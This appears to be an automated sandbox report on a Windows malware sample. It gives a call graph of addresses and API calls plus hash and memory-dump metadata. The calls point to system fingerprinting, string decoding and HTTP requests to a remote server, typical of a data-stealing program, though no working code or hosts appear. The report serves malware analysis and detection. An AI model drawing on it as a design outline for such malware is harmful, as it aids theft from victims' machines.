4023e0 116 API calls 34019 4180e0 7 API calls 32961 4226e0 GetWindowsDirectoryA 32962 422725 32961->32962 32963 42272c GetVolumeInformationA 32961->32963 32962->32963 32964 42278c GetProcessHeap HeapAlloc 32963->32964 32966 4227c6 wsprintfA 32964->32966 32967 4227c2 32964->32967 32966->32967 32970 427210 lstrcpy 32967->32970 32969 422800 32970->32969 34154 423fe0 GetFileAttributesA 34115 2471ccb 156 API calls 34020 40bce9 90 API calls 34117 2490ce7 612 API calls 34156 408ff0 21 API calls 34021 2490af0 1693 API calls 34075 24933f7 GetSystemInfo wsprintfA 32681 404b80 32682 404ba0 32681->32682 32683 404bb5 32682->32683 32684 404bad lstrcpy 32682->32684 32685 404ae0 5 API calls 32683->32685 32684->32683 32686 404bc0 32685->32686 32687 404bfc lstrcpy 32686->32687 32688 404c08 32686->32688 32687->32688 32689 404c2f lstrcpy 32688->32689 32690 404c3b 32688->32690 32689->32690 32691 404c5f lstrcpy 32690->32691 32692 404c6b 32690->32692 32691->32692 32693 404c9d lstrcpy 32692->32693 32694 404ca9 32692->32694 32693->32694 32695 404cd0 lstrcpy 32694->32695 32696 404cdc InternetOpenA StrCmpCA 32694->32696 32695->32696 32697 404d10 32696->32697 32698 4053e8 InternetCloseHandle CryptStringToBinaryA 32697->32698 32700 423e10 3 API calls 32697->32700 32699 405418 LocalAlloc 32698->32699 32716 405508 32698->32716 32701 40542f CryptStringToBinaryA 32699->32701 32699->32716 32705 404d2a 32700->32705 32702 405447 LocalFree 32701->32702 32703 405459 lstrlenA 32701->32703 32702->32716 32704 40546d 32703->32704 32706 405493 lstrlenA 32704->32706 32707 405487 lstrcpy 32704->32707 32708 404d53 lstrcpy lstrcatA 32705->32708 32709 404d68 32705->32709 32711 4054ad 32706->32711 32707->32706 32708->32709 32710 404d8a lstrcpy 32709->32710 32712 404d92 32709->32712 32710->32712 32713 4054bf lstrcpy lstrcatA 32711->32713 32714 4054d2 32711->32714 32715 404da1 lstrlenA 32712->32715 32713->32714 32717 405501 32714->32717 32719 4054f9 lstrcpy 32714->32719 32718 404db9 32715->32718 32717->32716 32720 404dc5 lstrcpy lstrcatA 32718->32720 32721 404ddc 32718->32721 32719->32717 32720->32721 32722 404e05 32721->32722 32723 404dfd lstrcpy 32721->32723 32724 404e0c lstrlenA 32722->32724 32723->32722 32725 404e22 32724->32725 32726 404e2e lstrcpy lstrcatA 32725->32726 32727 404e45 32725->32727 32726->32727 32728 404e66 lstrcpy 32727->32728 32729 404e6e 32727->32729 32728->32729 32730 404e95 lstrcpy lstrcatA 32729->32730 32731 404eab 32729->32731 32730->32731 32732 404ed4 32731->32732 32733 404ecc lstrcpy 32731->32733 32734 404edb lstrlenA 32732->32734 32733->32732 32735 404ef1 32734->32735 32736 404efd lstrcpy lstrcatA 32735->32736 32737 404f14 32735->32737 32736->32737 32738 404f3d 32737->32738 32739 404f35 lstrcpy 32737->32739 32740 404f44 lstrlenA 32738->32740 32739->32738 32741 404f5a 32740->32741 32742 404f66 lstrcpy lstrcatA 32741->32742 32743 404f7d 32741->32743 32742->32743 32744 404fa9 32743->32744 32745 404fa1 lstrcpy 32743->32745 32746 404fb0 lstrlenA 32744->32746 32745->32744 32747 404fcb 32746->32747 32748 404fdc lstrcpy lstrcatA 32747->32748 32749 404fec 32747->32749 32748->32749 32750 40500a lstrcpy lstrcatA 32749->32750 32751 40501d 32749->32751 32750->32751 32752 40503b lstrcpy 32751->32752 32753 405043 32751->32753 32752->32753 32754 405051 InternetConnectA 32753->32754 32754->32698 32755 405080 HttpOpenRequestA 32754->32755 32756 4053e1 InternetCloseHandle 32755->32756 32757 4050bb 32755->32757 32756->32698 32758 427340 3 API calls 32757->32758 32759 4050cb 32758->32759 32760 4272b0 lstrcpy 32759->32760 32761 4050d4 32760->32761 32762 4272f0 2 API calls 32761->32762 32763 4050e7 32762->32763 32764 4272b0 lstrcpy 32763->32764 32765 4050f0 32764->32765 32766 427340 3 API calls 32765->32766 32767 405105 32766->32767 32768 4272b0 lstrcpy 32767->32768 32769 40510e 32768->32769 32770 427340 3 API calls 32769->32770 32771 405124 32770->32771 32772 4272b0 lstrcpy 32771->32772 32773 40512d 32772->32773 32774 427340 3 API calls 32773->32774 32775 405143 32774->32775 32776 4272b0 lstrcpy 32775->32776 32777 40514c 32776->32777 32778 427340 3 API calls 32777->32778 32779 405161 32778->32779 32780 4272b0 lstrcpy 32779->32780 32781 40516a 32780->32781 32782 4272f0 2 API calls 32781->32782 32783 40517d 32782->32783 32784 4272b0 lstrcpy 32783->32784 32785 405186 32784->32785 32786 427340 3 API calls 32785->32786 32787 40519b 32786->32787 32788 4272b0 lstrcpy 32787->32788 32789 4051a4 32788->32789 32790 427340 3 API calls 32789->32790 32791 4051b9 32790->32791 32792 4272b0 lstrcpy 32791->32792 32793 4051c2 32792->32793 32794 4272f0 2 API calls 32793->32794 32795 4051d5 32794->32795 32796 4272b0 lstrcpy 32795->32796 32797 4051de 32796->32797 32798 427340 3 API calls 32797->32798 32799 4051f3 32798->32799 32800 4272b0 lstrcpy 32799->32800 32801 4051fc 32800->32801 32802 427340 3 API calls 32801->32802 32803 405212 32802->32803 32804 4272b0 lstrcpy 32803->32804 32805 40521b 32804->32805 32806 427340 3 API calls 32805->32806 32807 405231 32806->32807 32808 4272b0 lstrcpy 32807->32808 32809 40523a 32808->32809 32810 427340 3 API calls 32809->32810 32811 40524f 32810->32811 32812 4272b0 lstrcpy 32811->32812 32813 405258 32812->32813 32814 4272f0 2 API calls 32813->32814 32815 40526b 32814->32815 32816 4272b0 lstrcpy 32815->32816 32817 405274 32816->32817 32818 4052a0 lstrcpy 32817->32818 32819 4052ac 32817->32819 32818->32819 32820 4272f0 2 API calls 32819->32820 32821 4052ba 32820->32821 32822 4272f0 2 API calls 32821->32822 32823 4052c7 32822->32823 32824 4272b0 lstrcpy 32823->32824 32825 4052d1 32824->32825 32826 4052e1 lstrlenA lstrlenA HttpSendRequestA InternetReadFile 32825->32826 32827 405322 32826->32827 32828 4053cc InternetCloseHandle 32826->32828 32827->32828 32829 40532d lstrlenA 32827->32829 32831 40535e lstrcpy lstrcatA 32827->32831 32832 4053a3 32827->32832 32833 40539b lstrcpy 32827->32833 32830 4053de 32828->32830 32829->32827 32830->32756 32831->32827 32834 4053aa InternetReadFile 32832->32834 32833->32832 32834->32827 32834->32828 34119 2490c88 614 API calls 34120 425a80 11 API calls 34121 248e480 133 API calls 34022 24879aa 1128 API calls 34023 2492a87 10 API calls 34024 24881fc strtok_s StrCmpCA 34025 2493687 6 API calls 34124 2493487 7 API calls 32997 402d90 33630 404980 17 API calls 32997->33630 32999 402da2 33000 404980 34 API calls 32999->33000 33001 402dc0 33000->33001 33002 404980 34 API calls 33001->33002 33003 402dd6 33002->33003 33004 404980 34 API calls 33003->33004 33005 402deb 33004->33005 33006 404980 34 API calls 33005->33006 33007 402e0c 33006->33007 33008 404980 34 API calls 33007->33008 33009 402e21 33008->33009 33010 404980 34 API calls 33009->33010 33011 402e39 33010->33011 33012 404980 34 API calls 33011->33012 33013 402e5a 33012->33013 33014 404980 34 API calls 33013->33014 33015 402e6f 33014->33015 33016 404980 34 API calls 33015->33016 33017 402e85 33016->33017 33018 404980 34 API calls 33017->33018 33019 402e9b 33018->33019 33020 404980 34 API calls 33019->33020 33021 402eb1 33020->33021 33022 404980 34 API calls 33021->33022 33023 402eca 33022->33023 33024 404980 34 API calls 33023->33024 33025 402ee0 33024->33025 33026 404980 34 API calls 33025->33026 33027 402ef6 33026->33027 33028 404980 34 API calls 33027->33028 33029 402f0c 33028->33029 33030 404980 34 API calls 33029->33030 33031 402f22 33030->33031 33032 404980 34 API calls 33031->33032 33033 402f38 33032->33033 33034 404980 34 API calls 33033->33034 33035 402f51 33034->33035 33036 404980 34 API calls 33035->33036 33037 402f67 33036->33037 33038 404980 34 API calls 33037->33038 33039 402f7d 33038->33039 33040 404980 34 API calls 33039->33040 33041 402f93 33040->33041 33042 404980 34 API calls 33041->33042 33043 402fa9 33042->33043 33044 404980 34 API calls 33043->33044 33045 402fbf 33044->33045 33046 404980 34 API calls 33045->33046 33047 402fd8 33046->33047 33048 404980 34 API calls 33047->33048 33049 402fee 33048->33049 33050 404980 34 API calls 33049->33050 33051 403004 33050->33051 33052 404980 34 API calls 33051->33052 33053 40301a 33052->33053 33054 404980 34 API calls 33053->33054 33055 403030 33054->33055 33056 404980 34 API calls 33055->33056 33057 403046 33056->33057 33058 404980 34 API calls 33057->33058 33059 40305f 33058->33059 33060 404980 34 API calls 33059->33060 33061 403075 33060->33061 33062 404980 34 API calls 33061->33062 33063 40308b 33062->33063 33064 404980 34 API calls 33063->33064 33065 4030a1 33064->33065 33066 404980 34 API calls 33065->33066 33067 4030b7 33066->33067 33068 404980 34 API calls 33067->33068 33069 4030cd 33068->33069 33070 404980 34 API calls 33069->33070 33071 4030e6 33070->33071 33072 404980 34 API calls 33071->33072 33073 4030fc 33072->33073 33074 404980 34 API calls 33073->33074 33075 403112 33074->33075 33076 404980 34 API calls 33075->33076 33077 403128 33076->33077 33078 404980 34 API calls 33077->33078 33079 40313e 33078->33079 33080 404980 34 API calls 33079->33080 33081 403154 33080->33081 33082 404980 34 API calls 33081->33082 33083 40316d 33082->33083 33084 404980 34 API calls 33083->33084 33085 403183 33084->33085 33086 404980 34 API calls 33085->33086 33087 403199 33086->33087 33088 404980 34 API calls 33087->33088 33089 4031af 33088->33089 33090 404980 34 API calls 33089->33090 33091 4031c5 33090->33091 33092 404980 34 API calls 33091->33092 33093 4031db 33092->33093 33094 404980 34 API calls 33093->33094 33095 4031f4 33094->33095 33096 404980 34 API calls 33095->33096 33097 40320a 33096->33097 33098 404980 34 API calls 33097->33098 33099 403220 33098->33099 33100 404980 34 API calls 33099->33100 33101 403236 33100->33101 33102 404980 34 API calls 33101->33102 33103 40324c 33102->33103 33104 404980 34 API calls 33103->33104 33105 403262 33104->33105 33106 404980 34 API calls 33105->33106 33107 40327b 33106->33107 33108 404980 34 API calls 33107->33108 33109 403291 33108->33109 33110 404980 34 API calls 33109->33110 33111 4032a7 33110->33111 33112 404980 34 API calls 33111->33112 33113 4032bd 33112->33113 33114 404980 34 API calls 33113->33114 33115 4032d3 33114->33115 33116 404980 34 API calls 33115->33116 33117 4032e9 33116->33117 33118 404980 34 API calls 33117->33118 33119 403302 33118->33119 33120 404980 34 API calls 33119->33120 33121 403318 33120->33121 33122 404980 34 API calls 33121->33122 33123 40332e 33122->33123 33124 404980 34 API calls 33123->33124 33125 403344 33124->33125 33126 404980 34 API calls 33125->33126 33127 40335a 33126->33127 33128 404980 34 API calls 33127->33128 33129 403370 33128->33129 33130 404980 34 API calls 33129->33130 33131 403389 33130->33131 33132 404980 34 API calls 33131->33132 33133 40339f 33132->33133 33134 404980 34 API calls 33133->33134 33135 4033b5 33134->33135 33136 404980 34 API calls 33135->33136 33137 4033cb 33136->33137 33138 404980 34 API calls 33137->33138 33139 4033e1 33138->33139 33140 404980 34 API calls 33139->33140 33141 4033f7 33140->33141 33142 404980 34 API calls 33141->33142 33143 403410 33142->33143 33144 404980 34 API calls 33143->33144 33145 403426 33144->33145 33146 404980 34 API calls 33145->33146 33147 40343c 33146->33147 33148 404980 34 API calls 33147->33148 33149 403452 33148->33149 33150 404980 34 API calls 33149->33150 33151 403468 33150->33151 33152 404980 34 API calls 33151->33152 33153 40347e 33152->33153 33154 404980 34 API calls 33153->33154 33155 403497 33154->33155 33156 404980 34 API calls 33155->33156 33157 4034ad 33156->33157 33158 404980 34 API calls 33157->33158 33159 4034c3 33158->33159 33160 404980 34 API calls 33159->33160 33161 4034d9 33160->33161 33162 404980 34 API calls 33161->33162 33163 4034ef 33162->33163 33164 404980 34 API calls 33163->33164 33165 403505 33164->33165 33166 404980 34 API calls 33165->33166 33167 40351e 33166->33167 33168 404980 34 API calls 33167->33168 33169 403534 33168->33169 33170 404980 34 API calls 33169->33170 33171 40354a 33170->33171 33172 404980 34 API calls 33171->33172 33173 403560 33172->33173 33174 404980 34 API calls 33173->33174 33175 403576 33174->33175 33176 404980 34 API calls 33175->33176 33177 40358c 33176->33177 33178 404980 34 API calls 33177->33178 33179 4035a5 33178->33179 33180 404980 34 API calls 33179->33180 33181 4035bb 33180->33181 33182 404980 34 API calls 33181->33182 33183 4035d1 33182->33183 33184 404980 34 API calls 33183->33184 33185 4035e7 33184->33185 33186 404980 34 API calls 33185->33186 33187 4035fd 33186->33187 33188 404980 34 API calls 33187->33188 33189 403613 33188->33189 33190 404980 34 API calls 33189->33190 33191 40362c 33190->33191 33192 404980 34 API calls 33191->33192 33193 403642 33192->33193 33194 404980 34 API calls 33193->33194 33195 403658 33194->33195 33196 404980 34 API calls 33195->33196 33197 40366e 33196->33197 33198 404980 34 API calls 33197->33198 33199 403684 33198->33199 33200 404980 34 API calls 33199->33200 33201 40369a 33200->33201 33202 404980 34 API calls 33201->33202 33203 4036b3 33202->33203 33204 404980 34 API calls 33203->33204 33205 4036c9 33204->33205 33206 404980 34 API calls 33205->33206 33207 4036df 33206->33207 33208 404980 34 API calls 33207->33208 33209 4036f5 33208->33209 33210 404980 34 API calls 33209->33210 33211 40370b 33210->33211 33212 404980 34 API calls 33211->33212 33213 403721 33212->33213 33214 404980 34 API calls 33213->33214 33215 40373a 33214->33215 33216 404980 34 API calls 33215->33216 33217 403750 33216->33217 33218 404980 34 API calls 33217->33218 33219 403766 33218->33219 33220 404980 34 API calls 33219->33220 33221 40377c 33220->33221 33222 404980 34 API calls 33221->33222 33223 403792 33222->33223 33224 404980 34 API calls 33223->33224 33225 4037a8 33224->33225 33226 404980 34 API calls 33225->33226 33227 4037c1 33226->33227 33228 404980 34 API calls 33227->33228 33229 4037d7 33228->33229 33230 404980 34 API calls 33229->33230 33231 4037ed 33230->33231 33232 404980 34 API calls 33231->33232 33233 403803 33232->33233 33234 404980 34 API calls 33233->33234 33235 403819 33234->33235 33236 404980 34 API calls 33235->33236 33237 40382f 33236->33237 33238 404980 34 API calls 33237->33238 33239 403848 33238->33239 33240 404980 34 API calls 33239->33240 33241 40385e 33240->33241 33242 404980 34 API calls 33241->33242 33243 403874 33242->33243 33244 404980 34 API calls 33243->33244 33245 40388a 33244->33245 33246 404980 34 API calls 33245->33246 33247 4038a0 33246->33247 33248 404980 34 API calls 33247->33248 33249 4038b6 33248->33249 33250 404980 34 API calls 33249->33250 33251 4038cf 33250->33251 33252 404980 34 API calls 33251->33252 33253 4038e5 33252->33253 33254 404980 34 API calls 33253->33254 33255 4038fb 33254->33255 33256 404980 34 API calls 33255->33256 33257 403911 33256->33257 33258 404980 34 API calls 33257->33258 33259 403927 33258->33259 33260 404980 34 API calls 33259->33260 33261 40393d 33260->33261 33262 404980 34 API calls 33261->33262 33263 403956 33262->33263 33264 404980 34 API calls 33263->33264 33265 40396c 33264->33265 33266 404980 34 API calls 33265->33266 33267 403982 33266->33267 33268 404980 34 API calls 33267->33268 33269 403998 33268->33269 33270 404980 34 API calls 33269->33270 33271 4039ae 33270->33271 33272 404980 34 API calls 33271->33272 33273 4039c4 33272->33273 33274 404980 34 API calls 33273->33274 33275 4039dd 33274->33275 33276 404980 34 API calls 33275->33276 33277 4039f3 33276->33277 33278 404980 34 API calls 33277->33278 33279 403a09 33278->33279 33280 404980 34 API calls 33279->33280 33281 403a1f 33280->33281 33282 404980 34 API calls 33281->33282 33283 403a35 33282->33283 33284 404980 34 API calls 33283->33284 33285 403a4b 33284->33285 33286 404980 34 API calls 33285->33286 33287 403a64 33286->33287 33288 404980 34 API calls 33287->33288 33289 403a7a 33288->33289 33290 404980 34 API calls 33289->33290 33291 403a90 33290->33291 33292 404980 34 API calls 33291->33292 33293 403aa6 33292->33293 33294 404980 34 API calls 33293->33294 33295 403abc 33294->33295 33296 404980 34 API calls 33295->33296 33297 403ad2 33296->33297 33298 404980 34 API calls 33297->33298 33299 403aeb 33298->33299 33300 404980 34 API calls 33299->33300 33301 403b01 33300->33301 33302 404980 34 API calls 33301->33302 33303 403b17 33302->33303 33304 404980 34 API calls 33303->33304 33305 403b2d 33304->33305 33306 404980 34 API calls 33305->33306 33307 403b43 33306->33307 33308 404980 34 API calls 33307->33308 33309 403b59 33308->33309 33310 404980 34 API calls 33309->33310 33311 403b72 33310->33311 33312 404980 34 API calls 33311->33312 33313 403b88 33312->33313 33314 404980 34 API calls 33313->33314 33315 403b9e 33314->33315 33316 404980 34 API calls 33315->33316 33317 403bb4 33316->33317 33318 404980 34 API calls 33317->33318 33319 403bca 33318->33319 33320 404980 34 API calls 33319->33320 33321 403be0 33320->33321 33322 404980 34 API calls 33321->33322 33323 403bf9 33322->33323 33324 404980 34 API calls 33323->33324 33325 403c0f 33324->33325 33326 404980 34 API calls 33325->33326 33327 403c25 33326->33327 33328 404980 34 API calls 33327->33328 33329 403c3b 33328->33329 33330 404980 34 API calls 33329->33330 33331 403c51 33330->33331 33332 404980 34 API calls 33331->33332 33333 403c67 33332->33333 33334 404980 34 API calls 33333->33334 33335 403c80 33334->33335 33336 404980 34 API calls 33335->33336 33337 403c96 33336->33337 33338 404980 34 API calls 33337->33338 33339 403cac 33338->33339 33340 404980 34 API calls 33339->33340 33341 403cc2 33340->33341 33342 404980 34 API calls 33341->33342 33343 403cd8 33342->33343 33344 404980 34 API calls 33343->33344 33345 403cee 33344->33345 33346 404980 34 API calls 33345->33346 33347 403d07 33346->33347 33348 404980 34 API calls 33347->33348 33349 403d1d 33348->33349 33350 404980 34 API calls 33349->33350 33351 403d33 33350->33351 33352 404980 34 API calls 33351->33352 33353 403d49 33352->33353 33354 404980 34 API calls 33353->33354 33355 403d5f 33354->33355 33356 404980 34 API calls 33355->33356 33357 403d75 33356->33357 33358 404980 34 API calls 33357->33358 33359 403d8e 33358->33359 33360 404980 34 API calls 33359->33360 33361 403da4 33360->33361 33362 404980 34 API calls 33361->33362 33363 403dba 33362->33363 33364 404980 34 API calls 33363->33364 33365 403dd0 33364->33365 33366 404980 34 API calls 33365->33366 33367 403de6 33366->33367 33368 404980 34 API calls 33367->33368 33369 403dfc 33368->33369 33370 404980 34 API calls 33369->33370 33371 403e15 33370->33371 33372 404980 34 API calls 33371->33372 33373 403e2b 33372->33373 33374 404980 34 API calls 33373->33374 33375 403e41 33374->33375 33376 404980 34 API calls 33375->33376 33377 403e57 33376->33377 33378 404980 34 API calls 33377->33378 33379 403e6d 33378->33379 33380 404980 34 API calls 33379->33380 33381 403e83 33380->33381 33382 404980 34 API calls 33381->33382 33383 403e9c 33382->33383 33384 404980 34 API calls 33383->33384 33385 403eb2 33384->33385 33386 404980 34 API calls 33385->33386 33387 403ec8 33386->33387 33388 404980 34 API calls 33387->33388 33389 403ede 33388->33389 33390 404980 34 API calls 33389->33390 33391 403ef4 33390->33391 33392 404980 34 API calls 33391->33392 33393 403f0a 33392->33393 33394 404980 34 API calls 33393->33394 33395 403f23 33394->33395 33396 404980 34 API calls 33395->33396 33397 403f39 33396->33397 33398 404980 34 API calls 33397->33398 33399 403f4f 33398->33399 33400 404980 34 API calls 33399->33400 33401 403f65 33400->33401 33402 404980 34 API calls 33401->33402 33403 403f7b 33402->33403 33404 404980 34 API calls 33403->33404 33405 403f91 33404->33405 33406 404980 34 API calls 33405->33406 33407 403faa 33406->33407 33408 404980 34 API calls 33407->33408 33409 403fc0 33408->33409 33410 404980 34 API calls 33409->33410 33411 403fd6 33410->33411 33412 404980 34 API calls 33411->33412 33413 403fec 33412->33413 33414 404980 34 API calls 33413->33414 33415 404002 33414->33415 33416 404980 34 API calls 33415->33416 33417 404018 33416->33417 33418 404980 34 API calls 33417->33418 33419 404031 33418->33419 33420 404980 34 API calls 33419->33420 33421 404047 33420->33421 33422 404980 34 API calls 33421->33422 33423 40405d 33422->33423 33424 404980 34 API calls 33423->33424 33425 404073 33424->33425 33426 404980 34 API calls 33425->33426 33427 404089 33426->33427 33428 404980 34 API calls 33427->33428 33429 40409f 33428->33429 33430 404980 34 API calls 33429->33430 33431 4040b8 33430->33431 33432 404980 34 API calls 33431->33432 33433 4040ce 33432->33433 33434 404980 34 API calls 33433->33434 33435 4040e4 33434->33435 33436 404980 34 API calls 33435->33436 33437 4040fa 33436->33437 33438 404980 34 API calls 33437->33438 33439 404110 33438->33439 33440 404980 34 API calls 33439->33440 33441 404126 33440->33441 33442 404980 34 API calls 33441->33442 33443 40413f 33442->33443 33444 404980 34 API calls 33443->33444 33445 404155 33444->33445 33446 404980 34 API calls 33445->33446 33447 40416b 33446->33447 33448 404980 34 API calls 33447->33448 33449 404181 33448->33449 33450 404980 34 API calls 33449->33450 33451 404197 33450->33451 33452 404980 34 API calls 33451->33452 33453 4041ad 33452->33453 33454 404980 34 API calls 33453->33454 33455 4041c6 33454->33455 33456 404980 34 API calls 33455->33456 33457 4041dc 33456->33457 33458 404980 34 API calls 33457->33458 33459 4041f2 33458->33459 33460 404980 34 API calls 33459->33460 33461 404208 33460->33461 33462 404980 34 API calls 33461->33462 33463 40421e 33462->33463 33464 404980 34 API calls 33463->33464 33465 404234 33464->33465 33466 404980 34 API calls 33465->33466 33467 40424d 33466->33467 33468 404980 34 API calls 33467->33468 33469 404263 33468->33469 33470 404980 34 API calls 33469->33470 33471 404279 33470->33471 33472 404980 34 API calls 33471->33472 33473 40428f 33472->33473 33474 404980 34 API calls 33473->33474 33475 4042a5 33474->33475 33476 404980 34 API calls 33475->33476 33477 4042bb 33476->33477 33478 404980 34 API calls 33477->33478 33479 4042d4 33478->33479 33480 404980 34 API calls 33479->33480 33481 4042ea 33480->33481 33482 404980 34 API calls 33481->33482 33483 404300 33482->33483 33484 404980 34 API calls 33483->33484 33485 404316 33484->33485 33486 404980 34 API calls 33485->33486 33487 40432c 33486->33487 33488 404980 34 API calls 33487->33488 33489 404342 33488->33489 33490 404980 34 API calls 33489->33490 33491 40435b 33490->33491 33492 404980 34 API calls 33491->33492 33493 404371 33492->33493 33494 404980 34 API calls 33493->33494 33495 404387 33494->33495 33496 404980 34 API calls 33495->33496 33497 40439d 33496->33497 33498 404980 34 API calls 33497->33498 33499 4043b3 33498->33499 33500 404980 34 API calls 33499->33500 33501 4043c9 33500->33501 33502 404980 34 API calls 33501->33502 33503 4043e2 33502->33503 33504 404980 34 API calls 33503->33504 33505 4043f8 33504->33505 33506 404980 34 API calls 33505->33506 33507 40440e 33506->33507 33508 404980 34 API calls 33507->33508 33509 404424 33508->33509 33510 404980 34 API calls 33509->33510 33511 40443a 33510->33511 33512 404980 34 API calls 33511->33512 33513 404450 33512->33513 33514 404980 34 API calls 33513->33514 33515 404469 33514->33515 33516 404980 34 API calls 33515->33516 33517 40447f 33516->33517 33518 404980 34 API calls 33517->33518 33519 404495 33518->33519 33520 404980 34 API calls 33519->33520 33521 4044ab 33520->33521 33522 404980 34 API calls 33521->33522 33523 4044c1 33522->33523 33524 404980 34 API calls 33523->33524 33525 4044d7 33524->33525 33526 404980 34 API calls 33525->33526 33527 4044f0 33526->33527 33528 404980 34 API calls 33527->33528 33529 404506 33528->33529 33530 404980 34 API calls 33529->33530 33531 40451c 33530->33531 33532 404980 34 API calls 33531->33532 33533 404532 33532->33533 33534 404980 34 API calls 33533->33534 33535 404548 33534->33535 33536 404980 34 API calls 33535->33536 33537 40455e 33536->33537 33538 404980 34 API calls 33537->33538 33539 404577 33538->33539 33540 404980 34 API calls 33539->33540 33541 40458d 33540->33541 33542 404980 34 API calls 33541->33542 33543 4045a3 33542->33543 33544 404980 34 API calls 33543->33544 33545 4045b9 33544->33545 33546 404980 34 API calls 33545->33546 33547 4045cf 33546->33547 33548 404980 34 API calls 33547->33548 33549 4045e5 33548->33549 33550 404980 34 API calls 33549->33550 33551 4045fe 33550->33551 33552 404980 34 API calls 33551->33552 33553 404614 33552->33553 33554 404980 34 API calls 33553->33554 33555 40462a 33554->33555 33556 404980 34 API calls 33555->33556 33557 404640 33556->33557 33558 404980 34 API calls 33557->33558 33559 404656 33558->33559 33560 404980 34 API calls 33559->33560 33561 40466c 33560->33561 33562 404980 34 API calls 33561->33562 33563 404685 33562->33563 33564 404980 34 API calls 33563->33564 33565 40469b 33564->33565 33566 404980 34 API calls 33565->33566 33567 4046b1 33566->33567 33568 404980 34 API calls 33567->33568 33569 4046c7 33568->33569 33570 404980 34 API calls 33569->33570 33571 4046dd 33570->33571 33572 404980 34 API calls 33571->33572 33573 4046f3 33572->33573 33574 404980 34 API calls 33573->33574 33575 40470c 33574->33575 33576 404980 34 API calls 33575->33576 33577 404722 33576->33577 33578 404980 34 API calls 33577->33578 33579 404738 33578->33579 33580 404980 34 API calls 33579->33580 33581 40474e 33580->33581 33582 404980 34 API calls 33581->33582 33583 404764 33582->33583 33584 404980 34 API calls 33583->33584 33585 40477a 33584->33585 33586 404980 34 API calls 33585->33586 33587 404793 33586->33587 33588 404980 34 API calls 33587->33588 33589 4047a9 33588->33589 33590 404980 34 API calls 33589->33590 33591 4047bf 33590->33591 33592 404980 34 API calls 33591->33592 33593 4047d5 33592->33593 33594 404980 34 API calls 33593->33594 33595 4047eb 33594->33595 33596 404980 34 API calls 33595->33596 33597 404801 33596->33597 33598 404980 34 API calls 33597->33598 33599 40481a 33598->33599 33600 404980 34 API calls 33599->33600 33601 404830 33600->33601 33602 404980 34 API calls 33601->33602 33603 404846 33602->33603 33604 404980 34 API calls 33603->33604 33605 40485c 33604->33605 33606 404980 34 API calls 33605->33606 33607 404872 33606->33607 33608 404980 34 API calls 33607->33608 33609 404888 33608->33609 33610 404980 34 API calls 33609->33610 33611 4048a1 33610->33611 33612 404980 34 API calls 33611->33612 33613 4048b7 33612->33613 33614 404980 34 API calls 33613->33614 33615 4048cd 33614->33615 33616 404980 34 API calls 33615->33616 33617 4048e3 33616->33617 33618 404980 34 API calls 33617->33618 33619 4048f9 33618->33619 33620 404980 34 API calls 33619->33620 33621 40490f 33620->33621 33622 404980 34 API calls 33621->33622 33623 404928 33622->33623 33624 404980 34 API calls 33623->33624 33625 40493e 33624->33625 33626 404980 34 API calls 33625->33626 33627 404954 33626->33627 33628 404980 34 API calls 33627->33628 33629 40496a 33628->33629 33631 404a9a 6 API calls 33630->33631 33632 404a1e 33630->33632 33631->32999 33633 404a26 11 API calls 33632->33633 33633->33631 33633->33633 34077 248cb99 strtok_s lstrcpy lstrcpy strtok_s 34027 2491e9d ExitProcess 34028 248529d 289 API calls 34079 248c39d 11 API calls 34080 24950bc 16 API calls 34160 248c99f 17 API calls 34030 2490a91 1695 API calls 34161 405799 57 API calls 34162 24999a8 167 API calls __setmbcp 34081 2490bad 1684 API calls 34032 408ca9 ??2@YAPAXI strlen malloc strcpy_s RaiseException 34033 24932a7 GetSystemPowerStatus 34127 24984a7 RtlUnwind 34034 2481ea7 166 API calls 34084 248c3bf 15 API calls 34085 24807b0 120 API calls 34036 2498ab0 42 API calls __calloc_crt 34038 24886b5 strtok_s strtok_s 34164 2488fba lstrcpy strtok_s
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0040602F
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$InternetOpen
                                                              • String ID: "$------
                                                              • API String ID: 2041821634-2370822465
                                                              • Opcode ID: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
                                                              • Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
                                                              • Opcode Fuzzy Hash: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
                                                              • Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8
                                                              APIs
